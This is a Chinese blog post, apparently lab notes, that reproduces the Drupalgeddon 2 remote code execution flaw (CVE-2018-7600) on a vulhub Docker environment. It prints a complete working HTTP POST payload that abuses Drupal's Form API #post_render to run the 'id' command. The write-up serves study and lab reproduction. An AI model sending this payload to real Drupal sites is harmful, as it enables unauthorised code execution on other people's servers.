CVE-2018-7600

作者: 3mi1e | 来源:发表于2019-08-07 21:27 被阅读5次

    Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)

    1.漏洞影响版本

    Drupal 6/7/8版本的Form API

    2.漏洞危害

    远程代码执行

    3.漏洞POC
    cd /root/vulhub/drupal/CVE-2018-7600                   //进入本次复现的漏洞目录
    docker-compose up -d                                   //docker-compose搭建环境
    

    环境启动后,访问 http://your-ip:8080/ 将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。(注:最好使用English语言,否则可能出现翻译服务器连接失败)

    忘记截图,使用的昨天的截图

    我们向安装完成的drupal发送如下数据包:

    POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
    Host: your-ip:8080
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 103
    
    form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
    

    成功执行代码,这个代码最终执行了id命令:

    命令执行成功
    4.复盘

    漏洞出现原因
    参考:绿盟|CVE-2018-7600漏洞分析
    总结
    POC参考:
    1.拖欠的之前2014的updatexml sqlmap脚本(学习级)
    2.vulhub-2019-0806(Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920))的漏洞原因有代码审计的部分,未细看(第二优先级)
    3.拖欠修改poc为exp(第一优先级)a2u/CVE-2018-7600

    相关文章

      网友评论

        本文标题:CVE-2018-7600

        本文链接:https://www.haomeiwen.com/subject/lbtzdctx.html